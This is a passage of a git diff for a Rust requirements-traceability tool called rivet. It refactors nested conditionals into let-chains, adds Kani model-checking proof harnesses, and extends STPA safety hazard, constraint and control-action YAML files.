text[i..].starts_with("![") { - if let Some(link) = parse_markdown_link(&text[i + 1..]) { - let alt = html_escape(&link.text); - let src = html_escape(&link.url); - result.push_str(&format!( - "\"{alt}\"" - )); - let skip_to = i + 1 + link.total_len; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; + if ch == '!' + && text[i..].starts_with("![") + && let Some(link) = parse_markdown_link(&text[i + 1..]) + { + let alt = html_escape(&link.text); + let src = html_escape(&link.url); + result.push_str(&format!( + "\"{alt}\"" + )); + let skip_to = i + 1 + link.total_len; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); } + continue; } // Inline code (backticks) — must come before bold/italic since content is literal. - if ch == '`' { - if let Some(end) = text[i + 1..].find('`') { - let inner = html_escape(&text[i + 1..i + 1 + end]); - result.push_str(&format!("{inner}")); - let skip_to = i + 1 + end + 1; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; + if ch == '`' + && let Some(end) = text[i + 1..].find('`') + { + let inner = html_escape(&text[i + 1..i + 1 + end]); + result.push_str(&format!("{inner}")); + let skip_to = i + 1 + end + 1; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); } + continue; } // Markdown links [text](url) — must come before [[id]] artifact refs. - if ch == '[' && !text[i..].starts_with("[[") { - if let Some(link) = parse_markdown_link(&text[i..]) { - let text_part = html_escape(&link.text); - result.push_str(&format!( - "{text_part}", - href = html_escape(&link.url), - )); - let skip_to = i + link.total_len; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; + if ch == '[' + && !text[i..].starts_with("[[") + && let Some(link) = parse_markdown_link(&text[i..]) + { + let text_part = html_escape(&link.text); + result.push_str(&format!( + "{text_part}", + href = html_escape(&link.url), + )); + let skip_to = i + link.total_len; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); } + continue; } // Artifact embedding: {{artifact:ID}} - if ch == '{' && text[i..].starts_with("{{artifact:") { - if let Some(end) = text[i..].find("}}") { - let id = text[i + 11..i + end].trim(); - if let Some(info) = artifact_info(id) { - let desc_preview = if info.description.len() > 150 { - format!("{}…", &info.description[..150]) - } else { - info.description.clone() - }; - result.push_str(&format!( + if ch == '{' + && text[i..].starts_with("{{artifact:") + && let Some(end) = text[i..].find("}}") + { + let id = text[i + 11..i + end].trim(); + if let Some(info) = artifact_info(id) { + let desc_preview = if info.description.len() > 150 { + format!("{}…", &info.description[..150]) + } else { + info.description.clone() + }; + result.push_str(&format!( "
    \
    \ {id}\ @@ -724,23 +728,22 @@ fn resolve_inline( title = html_escape(&info.title), desc = html_escape(&desc_preview), )); - let skip_to = i + end + 2; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; - } else { - // Broken reference - result.push_str(&format!( - "{{{{artifact:{}}}}}", - html_escape(id) - )); - let skip_to = i + end + 2; - while chars.peek().is_some_and(|&(j, _)| j < skip_to) { - chars.next(); - } - continue; + let skip_to = i + end + 2; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); + } + continue; + } else { + // Broken reference + result.push_str(&format!( + "{{{{artifact:{}}}}}", + html_escape(id) + )); + let skip_to = i + end + 2; + while chars.peek().is_some_and(|&(j, _)| j < skip_to) { + chars.next(); } + continue; } } diff --git a/rivet-core/src/externals.rs b/rivet-core/src/externals.rs index cc1a7a0..6315465 100644 --- a/rivet-core/src/externals.rs +++ b/rivet-core/src/externals.rs @@ -24,13 +24,15 @@ pub enum ArtifactRef { pub fn parse_artifact_ref(s: &str) -> ArtifactRef { // Only split on first colon. The prefix must be purely alphabetic // (no digits, hyphens, or dots) to avoid confusion with IDs like "H-1.2". - if let Some((prefix, id)) = s.split_once(':') { - if !prefix.is_empty() && prefix.chars().all(|c| c.is_ascii_lowercase()) && !id.is_empty() { - return ArtifactRef::External { - prefix: prefix.to_string(), - id: id.to_string(), - }; - } + if let Some((prefix, id)) = s.split_once(':') + && !prefix.is_empty() + && prefix.chars().all(|c| c.is_ascii_lowercase()) + && !id.is_empty() + { + return ArtifactRef::External { + prefix: prefix.to_string(), + id: id.to_string(), + }; } ArtifactRef::Local(s.to_string()) } @@ -418,18 +420,19 @@ pub fn detect_version_conflicts( for ext in externals.values() { let ext_dir = resolve_external_dir(ext, &cache_dir, project_dir); let config_path = ext_dir.join("rivet.yaml"); - if let Ok(ext_config) = crate::load_project_config(&config_path) { - if let Some(ref ext_externals) = ext_config.externals { - for (ext_name, ext_ext) in ext_externals { - let repo_id = ext_ext.git.clone().unwrap_or_else(|| { - ext_ext.path.clone().unwrap_or_else(|| ext_name.clone()) - }); - let version = ext_ext.git_ref.clone().unwrap_or_else(|| "HEAD".into()); - by_url.entry(repo_id).or_default().push(ConflictEntry { - declared_by: ext.prefix.clone(), - version, - }); - } + if let Ok(ext_config) = crate::load_project_config(&config_path) + && let Some(ref ext_externals) = ext_config.externals + { + for (ext_name, ext_ext) in ext_externals { + let repo_id = ext_ext + .git + .clone() + .unwrap_or_else(|| ext_ext.path.clone().unwrap_or_else(|| ext_name.clone())); + let version = ext_ext.git_ref.clone().unwrap_or_else(|| "HEAD".into()); + by_url.entry(repo_id).or_default().push(ConflictEntry { + declared_by: ext.prefix.clone(), + version, + }); } } } @@ -646,11 +649,11 @@ pub fn detect_circular_deps( for ext in externals.values() { let ext_dir = resolve_external_dir(ext, &cache_dir, project_dir); let config_path = ext_dir.join("rivet.yaml"); - if let Ok(ext_config) = crate::load_project_config(&config_path) { - if let Some(ref ext_externals) = ext_config.externals { - let ext_deps: Vec = ext_externals.keys().cloned().collect(); - graph.insert(ext.prefix.clone(), ext_deps); - } + if let Ok(ext_config) = crate::load_project_config(&config_path) + && let Some(ref ext_externals) = ext_config.externals + { + let ext_deps: Vec = ext_externals.keys().cloned().collect(); + graph.insert(ext.prefix.clone(), ext_deps); } } diff --git a/rivet-core/src/formats/aadl.rs b/rivet-core/src/formats/aadl.rs index 687ae93..1f3ed6b 100644 --- a/rivet-core/src/formats/aadl.rs +++ b/rivet-core/src/formats/aadl.rs @@ -129,13 +129,13 @@ fn import_aadl_sources( // Run instance-level analyses if a root classifier is configured. let root_classifier = config.get("root-classifier"); - if let Some(root_name) = root_classifier { - if let Some(instance) = db.instantiate(root_name) { - let instance_diags = run_instance_analyses(&instance); - for diag in &instance_diags { - artifacts.push(analysis_diagnostic_to_artifact(diag_index, diag)); - diag_index += 1; - } + if let Some(root_name) = root_classifier + && let Some(instance) = db.instantiate(root_name) + { + let instance_diags = run_instance_analyses(&instance); + for diag in &instance_diags { + artifacts.push(analysis_diagnostic_to_artifact(diag_index, diag)); + diag_index += 1; } } diff --git a/rivet-core/src/lib.rs b/rivet-core/src/lib.rs index 168c442..abb4b4f 100644 --- a/rivet-core/src/lib.rs +++ b/rivet-core/src/lib.rs @@ -20,6 +20,9 @@ pub mod schema; pub mod store; pub mod validate; +#[cfg(kani)] +mod proofs; + #[cfg(feature = "wasm")] pub mod wasm_runtime; diff --git a/rivet-core/src/proofs.rs b/rivet-core/src/proofs.rs new file mode 100644 index 0000000..8bac2e6 --- /dev/null +++ b/rivet-core/src/proofs.rs @@ -0,0 +1,514 @@ +//! Kani bounded model checking proof harnesses. +//! +//! These harnesses verify panic-freedom and key invariants of rivet-core +//! functions using Kani's symbolic execution engine. They are compiled +//! only when `cfg(kani)` is active (i.e. when running `cargo kani`). +//! +//! **Running:** Install Kani, then `cargo kani -p rivet-core`. + +#[cfg(kani)] +mod proofs { + use std::collections::BTreeMap; + + use crate::coverage::{CoverageEntry, compute_coverage}; + use crate::externals::{ArtifactRef, parse_artifact_ref}; + use crate::links::LinkGraph; + use crate::model::{Artifact, Link}; + use crate::schema::{ + ArtifactTypeDef, Cardinality, LinkFieldDef, LinkTypeDef, Schema, SchemaFile, + SchemaMetadata, Severity, TraceabilityRule, + }; + use crate::store::Store; + use crate::validate; + + // ── Helpers ────────────────────────────────────────────────────────── + + /// Build a minimal artifact with the given id, type, and links. + fn make_artifact(id: &str, artifact_type: &str, links: Vec) -> Artifact { + Artifact { + id: id.into(), + artifact_type: artifact_type.into(), + title: id.into(), + description: None, + status: None, + tags: vec![], + links, + fields: BTreeMap::new(), + source_file: None, + } + } + + /// Build a minimal empty schema (no types, no rules). + fn empty_schema() -> Schema { + Schema::merge(&[SchemaFile { + schema: SchemaMetadata { + name: "kani-test".into(), + version: "0.1.0".into(), + namespace: None, + description: None, + extends: vec![], + }, + base_fields: vec![], + artifact_types: vec![], + link_types: vec![], + traceability_rules: vec![], + }]) + } + + /// Build a schema with a single artifact type and a single traceability rule. + fn schema_with_rule() -> Schema { + Schema::merge(&[SchemaFile { + schema: SchemaMetadata { + name: "kani-rule".into(), + version: "0.1.0".into(), + namespace: None, + description: None, + extends: vec![], + }, + base_fields: vec![], + artifact_types: vec![ArtifactTypeDef { + name: "requirement".into(), + description: "A requirement".into(), + fields: vec![], + link_fields: vec![], + aspice_process: None, + }], + link_types: vec![LinkTypeDef { + name: "satisfies".into(), + inverse: Some("satisfied-by".into()), + description: "satisfies link".into(), + source_types: vec![], + target_types: vec![], + }], + traceability_rules: vec![TraceabilityRule { + name: "req-traced".into(), + description: "Requirements must be satisfied".into(), + source_type: "requirement".into(), + required_link: None, + required_backlink: Some("satisfies".into()), + target_types: vec![], + from_types: vec![], + severity: Severity::Warning, + }], + }]) + } + + // ── 1. parse_artifact_ref: panic-freedom ──────────────────────────── + + /// Proves that `parse_artifact_ref` never panics for any string input + /// up to 64 bytes. This covers all possible combinations of colons, + /// ASCII letters, digits, punctuation, and empty strings. + #[kani::proof] + #[kani::unwind(66)] + fn proof_parse_artifact_ref_no_panic() { + // Use a bounded byte array and convert to a valid UTF-8 string. + // Kani will explore all possible byte sequences up to this length. + let len: usize = kani::any(); + kani::assume(len <= 8); // keep tractable for bounded model checking + let mut bytes = [0u8; 8]; + for i in 0..8 { + if i < len { + bytes[i] = kani::any(); + // Restrict to printable ASCII to keep within valid UTF-8 + // and to exercise the colon-splitting logic meaningfully. + kani::assume(bytes[i] >= 0x20 && bytes[i] <= 0x7E); + } + } + let s = std::str::from_utf8(&bytes[..len]); + if let Ok(input) = s { + let result = parse_artifact_ref(input); + // Verify the result is well-formed: the original string is + // recoverable from the parsed reference. + match &result { + ArtifactRef::Local(id) => { + kani::assert(id == input, "Local ref must preserve input"); + } + ArtifactRef::External { prefix, id } => { + // prefix:id must reconstruct the original + kani::assert(!prefix.is_empty(), "External prefix must be non-empty"); + kani::assert(!id.is_empty(), "External id must be non-empty"); + kani::assert( + prefix.chars().all(|c| c.is_ascii_lowercase()), + "External prefix must be all lowercase ASCII", + ); + } + } + } + } + + // ── 2. Store::insert: panic-freedom ───────────────────────────────── + + /// Proves that `Store::insert` never panics for any artifact with + /// bounded-length fields. The function may return Ok or Err, but + /// must not panic. + #[kani::proof] + fn proof_store_insert_no_panic() { + let mut store = Store::new(); + + // Build an artifact with symbolic id and type + let id_len: usize = kani::any(); + kani::assume(id_len >= 1 && id_len <= 4); + let type_len: usize = kani::any(); + kani::assume(type_len >= 1 && type_len <= 4); + + let mut id_bytes = [b'A'; 4]; + for i in 0..4 { + if i < id_len { + id_bytes[i] = kani::any(); + kani::assume(id_bytes[i].is_ascii_alphanumeric() || id_bytes[i] == b'-'); + } + } + let mut type_bytes = [b'a'; 4]; + for i in 0..4 { + if i < type_len { + type_bytes[i] = kani::any(); + kani::assume(type_bytes[i].is_ascii_lowercase()); + } + } + + let id = String::from_utf8(id_bytes[..id_len].to_vec()).unwrap(); + let atype = String::from_utf8(type_bytes[..type_len].to_vec()).unwrap(); + + let artifact = make_artifact(&id, &atype, vec![]); + let _ = store.insert(artifact); + // Reaching here proves no panic occurred. + } + + // ── 3. Store::insert duplicate returns Err ────────────────────────── + + /// Proves that inserting an artifact with the same ID twice always + /// returns `Err` on the second call, while the first always succeeds + /// on an empty store. + #[kani::proof] + fn proof_store_duplicate_returns_error() { + let mut store = Store::new(); + + let a1 = make_artifact("KANI-DUP", "requirement", vec![]); + let a2 = make_artifact("KANI-DUP", "requirement", vec![]); + + let first = store.insert(a1); + kani::assert(first.is_ok(), "First insert into empty store must succeed"); + + let second = store.insert(a2); + kani::assert( + second.is_err(), + "Second insert with same ID must return Err", + ); + + // Store length must still be 1 + kani::assert(store.len() == 1, "Store must contain exactly one artifact"); + } + + // ── 4. CoverageEntry::percentage bounds ───────────────────────────── + + /// Proves that `CoverageEntry::percentage()` always returns a value + /// in [0.0, 100.0] for any valid (covered, total) pair where + /// covered <= total. + #[kani::proof] + fn proof_coverage_percentage_bounds() { + let covered: usize = kani::any(); + let total: usize = kani::any(); + + // Bound to avoid solver explosion on large numbers + kani::assume(total <= 1024); + kani::assume(covered <= total); + + let entry = CoverageEntry { + rule_name: String::new(), + description: String::new(), + source_type: String::new(), + link_type: String::new(), + direction: crate::coverage::CoverageDirection::Forward, + target_types: vec![], + covered, + total, + uncovered_ids: vec![], + }; + + let pct = entry.percentage(); + kani::assert(pct >= 0.0, "Coverage percentage must be >= 0.0"); + kani::assert(pct <= 100.0, "Coverage percentage must be <= 100.0"); + + // Additional: when total is 0, percentage must be 100.0 + if total == 0 { + kani::assert(pct == 100.0, "Coverage with zero total must be 100.0"); + } + + // Additional: when covered == total and total > 0, percentage must be 100.0 + if covered == total && total > 0 { + kani::assert(pct == 100.0, "Full coverage must yield 100.0"); + } + + // Additional: when covered == 0 and total > 0, percentage must be 0.0 + if covered == 0 && total > 0 { + kani::assert(pct == 0.0, "Zero coverage must yield 0.0"); + } + } + + // ── 5. Cardinality exhaustive match ───────────────────────────────── + + /// Proves that the cardinality matching logic in validation handles + /// all enum variants without hitting an unreachable state. We + /// construct a schema with every cardinality variant and verify that + /// validate() processes them all without panicking. + #[kani::proof] + fn proof_cardinality_exhaustive() { + let cardinalities = [ + Cardinality::ExactlyOne, + Cardinality::ZeroOrMany, + Cardinality::ZeroOrOne, + Cardinality::OneOrMany, + ]; + + // Pick a symbolic cardinality index + let idx: usize = kani::any(); + kani::assume(idx < cardinalities.len()); + let cardinality = cardinalities[idx].clone(); + + // Build a schema with a single artifact type having one link field + // with the chosen cardinality + let schema = Schema::merge(&[SchemaFile { + schema: SchemaMetadata { + name: "kani-card".into(), + version: "0.1.0".into(), + namespace: None, + description: None, + extends: vec![], + }, + base_fields: vec![], + artifact_types: vec![ArtifactTypeDef { + name: "test-type".into(), + description: "test".into(), + fields: vec![], + link_fields: vec![LinkFieldDef { + name: "test-link".into(), + link_type: "depends-on".into(), + target_types: vec![], + required: true, + cardinality, + }], + aspice_process: None, + }], + link_types: vec![], + traceability_rules: vec![], + }]); + + // Build a store with an artifact of that type, with a symbolic + // number of links (0, 1, or 2) + let link_count: usize = kani::any(); + kani::assume(link_count <= 2); + + let mut links = Vec::new(); + for i in 0..link_count { + let target_id = if i == 0 { + "TARGET-A".to_string() + } else { + "TARGET-B".to_string() + }; + links.push(Link { + link_type: "depends-on".into(), + target: target_id, + }); + } + + let mut store = Store::new(); + store + .insert(make_artifact("CARD-TEST", "test-type", links)) + .unwrap(); + // Add targets so links aren't broken + store + .insert(make_artifact("TARGET-A", "test-type", vec![])) + .unwrap(); + store + .insert(make_artifact("TARGET-B", "test-type", vec![])) + .unwrap(); + + let graph = LinkGraph::build(&store, &schema); + let diagnostics = validate::validate(&store, &schema, &graph); + + // We don't assert specific diagnostics — the proof succeeds if + // validate() completes without panicking for every combination + // of cardinality variant and link count. + let _ = diagnostics; + } + + // ── 6. compute_coverage end-to-end: bounds check ──────────────────── + + /// Proves that `compute_coverage` produces a report where every + /// entry has covered <= total and percentage in [0.0, 100.0], and + /// the overall coverage is also bounded. + #[kani::proof] + fn proof_compute_coverage_report_bounds() { + let schema = schema_with_rule(); + let mut store = Store::new(); + + // Symbolically decide how many requirements to insert (0..3) + let n: usize = kani::any(); + kani::assume(n <= 3); + + for i in 0..n { + let id = match i { + 0 => "REQ-K0", + 1 => "REQ-K1", + 2 => "REQ-K2", + _ => unreachable!(), + }; + store + .insert(make_artifact(id, "requirement", vec![])) + .unwrap(); + } + + let graph = LinkGraph::build(&store, &schema); + let report = compute_coverage(&store, &schema, &graph); + + for entry in &report.entries { + kani::assert(entry.covered <= entry.total, "covered must be <= total"); + let pct = entry.percentage(); + kani::assert(pct >= 0.0, "entry percentage must be >= 0"); + kani::assert(pct <= 100.0, "entry percentage must be <= 100"); + } + + let overall = report.overall_coverage(); + kani::assert(overall >= 0.0, "overall coverage must be >= 0"); + kani::assert(overall <= 100.0, "overall coverage must be <= 100"); + } + + // ── 7. Schema::merge: idempotence ─────────────────────────────────── + + /// Proves that merging a schema with itself produces the same number + /// of artifact types and link types (idempotence). + #[kani::proof] + fn proof_schema_merge_idempotent() { + let file = SchemaFile { + schema: SchemaMetadata { + name: "kani-idem".into(), + version: "0.1.0".into(), + namespace: None, + description: None, + extends: vec![], + }, + base_fields: vec![], + artifact_types: vec![ArtifactTypeDef { + name: "req".into(), + description: "requirement".into(), + fields: vec![], + link_fields: vec![], + aspice_process: None, + }], + link_types: vec![LinkTypeDef { + name: "satisfies".into(), + inverse: Some("satisfied-by".into()), + description: "satisfies link".into(), + source_types: vec![], + target_types: vec![], + }], + traceability_rules: vec![], + }; + + let single = Schema::merge(&[file.clone()]); + let doubled = Schema::merge(&[file.clone(), file]); + + kani::assert( + single.artifact_types.len() == doubled.artifact_types.len(), + "Merging schema with itself must preserve artifact type count", + ); + kani::assert( + single.link_types.len() == doubled.link_types.len(), + "Merging schema with itself must preserve link type count", + ); + kani::assert( + single.inverse_map.len() == doubled.inverse_map.len(), + "Merging schema with itself must preserve inverse map size", + ); + } + + // ── 8. LinkGraph: orphan detection correctness ────────────────────── + + /// Proves that an artifact with no links (inserted alone) is always + /// detected as an orphan. + #[kani::proof] + fn proof_linkgraph_lone_artifact_is_orphan() { + let schema = empty_schema(); + let mut store = Store::new(); + store + .insert(make_artifact("ORPHAN-1", "test", vec![])) + .unwrap(); + + let graph = LinkGraph::build(&store, &schema); + let orphans = graph.orphans(&store); + + kani::assert( + orphans.len() == 1, + "Single unlinked artifact must be an orphan", + ); + kani::assert( + orphans[0] == "ORPHAN-1", + "Orphan ID must match inserted artifact", + ); + } + + // ── 9. LinkGraph: has_cycles is false for DAG ─────────────────────── + + /// Proves that a simple chain A -> B -> C (a DAG) has no cycles. + #[kani::proof] + fn proof_linkgraph_dag_no_cycles() { + let schema = empty_schema(); + let mut store = Store::new(); + store + .insert(make_artifact( + "A", + "test", + vec![Link { + link_type: "dep".into(), + target: "B".into(), + }], + )) + .unwrap(); + store + .insert(make_artifact( + "B", + "test", + vec![Link { + link_type: "dep".into(), + target: "C".into(), + }], + )) + .unwrap(); + store.insert(make_artifact("C", "test", vec![])).unwrap(); + + let graph = LinkGraph::build(&store, &schema); + kani::assert(!graph.has_cycles(), "A->B->C DAG must not have cycles"); + } + + // ── 10. LinkGraph: cycle detection ────────────────────────────────── + + /// Proves that a cycle A -> B -> A is correctly detected. + #[kani::proof] + fn proof_linkgraph_cycle_detected() { + let schema = empty_schema(); + let mut store = Store::new(); + store + .insert(make_artifact( + "CYC-A", + "test", + vec![Link { + link_type: "dep".into(), + target: "CYC-B".into(), + }], + )) + .unwrap(); + store + .insert(make_artifact( + "CYC-B", + "test", + vec![Link { + link_type: "dep".into(), + target: "CYC-A".into(), + }], + )) + .unwrap(); + + let graph = LinkGraph::build(&store, &schema); + kani::assert(graph.has_cycles(), "A->B->A must be detected as a cycle"); + } +} diff --git a/rivet-core/src/query.rs b/rivet-core/src/query.rs index 80e9c9a..69eb2f6 100644 --- a/rivet-core/src/query.rs +++ b/rivet-core/src/query.rs @@ -15,30 +15,30 @@ pub struct Query { impl Query { pub fn matches(&self, artifact: &Artifact) -> bool { - if let Some(t) = &self.artifact_type { - if artifact.artifact_type != *t { - return false; - } + if let Some(t) = &self.artifact_type + && artifact.artifact_type != *t + { + return false; } - if let Some(s) = &self.status { - if artifact.status.as_deref() != Some(s.as_str()) { - return false; - } + if let Some(s) = &self.status + && artifact.status.as_deref() != Some(s.as_str()) + { + return false; } - if let Some(tag) = &self.tag { - if !artifact.tags.contains(tag) { - return false; - } + if let Some(tag) = &self.tag + && !artifact.tags.contains(tag) + { + return false; } - if let Some(lt) = &self.has_link_type { - if !artifact.has_link_type(lt) { - return false; - } + if let Some(lt) = &self.has_link_type + && !artifact.has_link_type(lt) + { + return false; } - if let Some(lt) = &self.missing_link_type { - if artifact.has_link_type(lt) { - return false; - } + if let Some(lt) = &self.missing_link_type + && artifact.has_link_type(lt) + { + return false; } true } diff --git a/rivet-core/src/store.rs b/rivet-core/src/store.rs index 4f2f03c..52495dd 100644 --- a/rivet-core/src/store.rs +++ b/rivet-core/src/store.rs @@ -40,12 +40,11 @@ impl Store { let artifact_type = artifact.artifact_type.clone(); // Remove from old type index if updating - if let Some(old) = self.artifacts.get(&id) { - if old.artifact_type != artifact_type { - if let Some(ids) = self.by_type.get_mut(&old.artifact_type) { - ids.retain(|i| i != &id); - } - } + if let Some(old) = self.artifacts.get(&id) + && old.artifact_type != artifact_type + && let Some(ids) = self.by_type.get_mut(&old.artifact_type) + { + ids.retain(|i| i != &id); } self.artifacts.insert(id.clone(), artifact); diff --git a/rivet-core/src/validate.rs b/rivet-core/src/validate.rs index 57f9c2e..b4c0935 100644 --- a/rivet-core/src/validate.rs +++ b/rivet-core/src/validate.rs @@ -70,22 +70,20 @@ pub fn validate(store: &Store, schema: &Schema, graph: &LinkGraph) -> Vec Vec + Dashboard must enforce a node budget on graph layout, display a + helpful message when exceeded, and provide filter/focus controls + to narrow the view. Layout computation must run in spawn_blocking + to avoid blocking the async runtime. + ucas: [UCA-D-3] + hazards: [H-13] + + # ========================================================================= + # Incremental validation constraints (salsa) + # ========================================================================= + - id: CC-C-10 + controller: CTRL-CORE + constraint: > + Core salsa database must invalidate all dependent queries when + an artifact source file is modified on disk, ensuring no stale + cached results are returned. + ucas: [UCA-C-10] + hazards: [H-9, H-1, H-3] + + - id: CC-C-11 + controller: CTRL-CORE + constraint: > + Core must re-evaluate all conditional rules whose when-clause + references a field that has changed, even if the artifact's + other fields are unchanged. + ucas: [UCA-C-11] + hazards: [H-9, H-1] + + - id: CC-C-12 + controller: CTRL-CORE + constraint: > + Core must detect contradictory conditional rules at schema load + time and reject the schema with a diagnostic identifying the + conflicting rules, before any validation occurs. + ucas: [UCA-C-12] + hazards: [H-10] + + - id: CC-C-13 + controller: CTRL-CORE + constraint: > + Core incremental validation must produce byte-identical diagnostic + output compared to a clean full validation pass for the same inputs. + A periodic full-revalidation check must verify this invariant. + ucas: [UCA-C-13] + hazards: [H-9, H-3] + + - id: CC-C-14 + controller: CTRL-CORE + constraint: > + Core must enforce that schema loading and merge complete before + conditional rule evaluation begins, via salsa query dependencies. + ucas: [UCA-C-14] + hazards: [H-9, H-10] + + # ========================================================================= + # MODULE.bazel parser constraints + # ========================================================================= + - id: CC-C-15 + controller: CTRL-CORE + constraint: > + Parser must extract git_override, archive_override, and + local_path_override declarations and apply them to override + the corresponding bazel_dep version/source. + ucas: [UCA-C-15] + hazards: [H-11, H-1] + + - id: CC-C-16 + controller: CTRL-CORE + constraint: > + Parser must emit a diagnostic for every Starlark construct it + does not support, listing what was skipped and what dependencies + may be missing from the result. Silent skip is forbidden. + ucas: [UCA-C-16] + hazards: [H-11] + + - id: CC-C-17 + controller: CTRL-CORE + constraint: > + Parser must associate keyword argument values with the correct + parameter names in the CST, verified by test cases covering all + supported function call types. + ucas: [UCA-C-17] + hazards: [H-11, H-1] diff --git a/safety/stpa/hazards.yaml b/safety/stpa/hazards.yaml index 5f30d28..9d5a4d9 100644 --- a/safety/stpa/hazards.yaml +++ b/safety/stpa/hazards.yaml @@ -82,6 +82,57 @@ hazards: incident. losses: [L-1, L-3, L-4] + - id: H-9 + title: Rivet incremental validation returns stale results due to missed invalidation + description: > + The salsa incremental computation engine fails to invalidate a + cached validation result when an upstream input changes. The + validation reports PASS based on the previous state while the + current state contains violations. In a worst-case environment + where CI trusts incremental results, this silently passes a + broken traceability state. + losses: [L-1, L-2, L-5] + + - id: H-10 + title: Rivet conditional validation rules contradict, making compliance impossible + description: > + Two or more conditional rules fire on the same artifact and impose + contradictory requirements (e.g., rule A requires field X when + status=approved, rule B forbids field X when safety=ASIL_B). + No valid artifact configuration exists, but the tool does not + detect the inconsistency, causing perpetual validation failures + that engineers work around by disabling rules. + losses: [L-1, L-4, L-5] + + - id: H-11 + title: Rivet MODULE.bazel parser silently misparses dependency declarations + description: > + The Starlark subset parser incorrectly extracts module names, + versions, or git_override commits from MODULE.bazel. Cross-repo + validation runs against the wrong repo versions, reporting + traceability coverage against mismatched baselines. + losses: [L-1, L-2, L-5] + + - id: H-12 + title: Rivet formal proofs verify a model that diverges from the implementation + description: > + The Rocq metamodel specification or Verus annotations describe + properties of an idealized validation algorithm that differs from + the actual Rust implementation. Proofs pass but the implementation + has bugs that the proofs do not cover, creating false assurance + of correctness. + losses: [L-2, L-5] + + - id: H-13 + title: Rivet dashboard becomes unresponsive when artifact count exceeds layout engine capacity + description: > + When a project contains hundreds or thousands of artifacts, the graph + layout algorithm (O(N² log N) Sugiyama) exhausts memory or blocks the + async runtime, causing the dashboard to hang or crash. Engineers lose + the ability to visualize and navigate traceability, defeating the + tool's purpose. + losses: [L-4, L-5] + sub-hazards: # --- H-1 refinements: types of stale references --- - id: H-1.1 @@ -132,3 +183,39 @@ sub-hazards: ReqIF XHTML content or OSLC rich-text descriptions are stripped to plain text, losing tables, formulas, or embedded diagrams that are essential to understanding the requirement. + + # --- H-9 refinements: incremental invalidation failures --- + - id: H-9.1 + parent: H-9 + title: Rivet salsa database does not track schema file changes as inputs + description: > + A schema file is modified (e.g., adding a conditional rule) but + the salsa input query for schemas is not invalidated. Validation + continues using the old schema, missing the new rule. + + - id: H-9.2 + parent: H-9 + title: Rivet salsa database does not invalidate cross-repo link validation on external changes + description: > + An external repository's artifacts change (new commit fetched), + but the salsa queries for cross-repo link resolution are not + invalidated. Broken cross-repo links are not detected. + + # --- H-11 refinements: parser misparse scenarios --- + - id: H-11.1 + parent: H-11 + title: Rivet parser ignores git_override and uses registry version instead + description: > + MODULE.bazel contains both bazel_dep(version="1.0") and + git_override(commit="abc123"). The parser extracts the registry + version but misses the override, causing validation against the + wrong repo checkout. + + - id: H-11.2 + parent: H-11 + title: Rivet parser fails on valid Starlark syntax it does not support + description: > + MODULE.bazel uses string concatenation, variable references, or + load() statements that the Starlark subset parser does not handle. + The parser silently skips the unrecognized construct, missing a + dependency declaration. diff --git a/safety/stpa/system-constraints.yaml b/safety/stpa/system-constraints.yaml index 2c06301..c6682b4 100644 --- a/safety/stpa/system-constraints.yaml +++ b/safety/stpa/system-constraints.yaml @@ -97,3 +97,51 @@ system-constraints: exists and is reachable at link-creation time, recording the verification timestamp. hazards: [H-1, H-3] + + - id: SC-11 + title: Rivet incremental validation must produce identical results to full validation + description: > + For any set of inputs, incremental validation (via salsa dependency + tracking) must produce exactly the same diagnostics as a clean full + validation pass. If incremental and full results ever diverge, the + system must detect the divergence and fall back to full validation. + hazards: [H-9] + + - id: SC-12 + title: Rivet must verify conditional rule consistency before applying rules + description: > + When loading schemas with conditional rules, Rivet must check that + no combination of conditions can produce contradictory requirements + on a single artifact. Inconsistent rule sets must be rejected at + schema load time with a diagnostic identifying the conflicting rules. + hazards: [H-10] + + - id: SC-13 + title: Rivet build-system parsers must reject unrecognized constructs with diagnostics + description: > + The MODULE.bazel parser must emit a diagnostic for any Starlark + construct it does not support (load statements, variable references, + string concatenation, conditionals). Silently skipping constructs + is forbidden. The parser must report what it could not parse and + what dependencies may be missing from the result. + hazards: [H-11] + + - id: SC-14 + title: Rivet formal proofs must be validated against the implementation under test + description: > + Formal verification must prove properties of the actual compiled + code, not a separate model. Kani harnesses must call the real + functions. Verus annotations must be on the real implementations. + Rocq specifications must be generated from or validated against + the Rust source via coq-of-rust, not hand-written independently. + hazards: [H-12] + + - id: SC-15 + title: Dashboard must degrade gracefully when artifact count exceeds rendering thresholds + description: > + The dashboard must impose node budgets on graph layout, paginate + large artifact lists, and progressively disclose detail rather than + attempting to render everything at once. Layout computation must run + outside the async runtime to prevent blocking other requests. + hazards: [H-13] + spec-baseline: "v0.2.0" diff --git a/safety/stpa/ucas.yaml b/safety/stpa/ucas.yaml index 3e41da9..6d2dd6f 100644 --- a/safety/stpa/ucas.yaml +++ b/safety/stpa/ucas.yaml @@ -527,5 +527,148 @@ dashboard-ucas: Stale metrics mislead developers and auditors about the current state of traceability. + - id: UCA-D-3 + description: > + Dashboard provides full unfiltered graph visualization when artifact + count exceeds the layout engine's capacity, causing the Sugiyama + algorithm to exhaust memory or block the async runtime. + context: > + Project contains 500+ artifacts and user navigates to /graph without + type filters or focus. The layout runs synchronously on the tokio + runtime thread. + hazards: [H-13] + rationale: > + The O(N² log N) barycenter heuristic with 4 sweep iterations becomes + prohibitively expensive above ~300 nodes. Running it on the async + runtime blocks all other dashboard requests. + + too-early-too-late: [] + stopped-too-soon: [] + +# ============================================================================= +# Core Engine UCAs — Incremental validation (salsa) +# CA-CORE-1 extended: incremental link graph rebuild +# CA-CORE-2 extended: incremental validation +# ============================================================================= +incremental-ucas: + control-action: Incrementally recompute validation via salsa dependency tracking + controller: CTRL-CORE + + not-providing: + - id: UCA-C-10 + description: > + Core salsa database does not invalidate link graph queries when + an artifact file is modified on disk. + context: > + Developer edits a YAML file, but the salsa input query for that + file is not updated. Subsequent validation returns cached results + from the previous file contents. + hazards: [H-9, H-1, H-3] + rationale: > + The fundamental incremental correctness property is violated: + stale cached validation results create false assurance. + + - id: UCA-C-11 + description: > + Core does not re-evaluate 